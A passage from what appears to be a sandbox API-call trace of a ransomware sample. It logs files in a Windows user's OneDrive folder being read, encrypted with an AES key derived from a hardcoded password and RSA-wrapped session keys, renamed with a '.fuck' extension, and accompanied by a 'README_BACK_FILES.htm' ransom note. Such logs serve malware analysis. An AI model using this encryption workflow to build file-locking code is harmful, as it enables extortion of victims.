hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.510] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.510] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.510] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.510] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.510] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.510] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.510] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.510] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.510] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.510] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.510] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.511] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.511] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.511] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.511] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.511] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.511] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.511] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.511] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.511] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.511] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.511] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.511] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.511] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.511] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.511] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.512] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.512] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.512] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.512] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.512] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.512] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.512] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.512] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.512] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.512] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.512] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.512] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.512] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.512] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.512] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.513] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.513] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.513] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.513] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.513] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.513] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.513] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.513] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.513] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.513] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.513] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x150, lpOverlapped=0x0) returned 1 [0280.513] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x150, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x160) returned 1 [0280.513] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x160, lpOverlapped=0x0) returned 1 [0280.513] CloseHandle (hObject=0x5d48) returned 1 [0280.514] CloseHandle (hObject=0x5d68) returned 1 [0280.514] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lt\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lt\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0280.520] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0280.520] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lt\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0280.523] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lt\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lt\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0280.524] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0280.524] CryptDestroyKey (hKey=0x2fc3c8) returned 1 [0280.524] CryptReleaseContext (hProv=0x2f1eb30, dwFlags=0x0) returned 1 [0280.524] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0280.524] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0280.525] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lt\\readme_back_files.htm")) returned 0xffffffff [0280.525] AreFileApisANSI () returned 1 [0280.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0280.525] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0280.526] GetFileType (hFile=0x5d3c) returned 0x1 [0280.526] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0280.527] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0280.527] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lv\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0280.530] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0280.530] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0280.530] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0280.530] GetLastError () returned 0x0 [0280.530] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lv\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lv\\filesync.localizedresources.dll.mui")) returned 0x20 [0280.530] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lv\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0280.531] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lv\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lv\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d68 [0280.532] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lv\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lv\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0280.586] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lv\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0280.587] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1e5e0) returned 1 [0280.589] CryptCreateHash (in: hProv=0x2f1e5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0280.589] lstrlenA (lpString="TXNdkJRdVYjLbGOsIhrFFzdHzMlQm") returned 29 [0280.589] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0280.589] CryptDeriveKey (in: hProv=0x2f1e5e0, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc908) returned 1 [0280.589] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0280.590] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0280.590] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1e668) returned 1 [0280.590] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1e668, dwCertEncodingType=0x1, pInfo=0x2f36a10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f36a40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f36a48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc888) returned 1 [0280.590] CryptEncrypt (in: hKey=0x2fc888, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0280.591] CryptEncrypt (in: hKey=0x2fc888, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1f080*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1f080*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0280.591] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f1f080*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1f080*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0280.592] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.614] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.614] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.619] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.619] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.619] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.619] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.620] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: 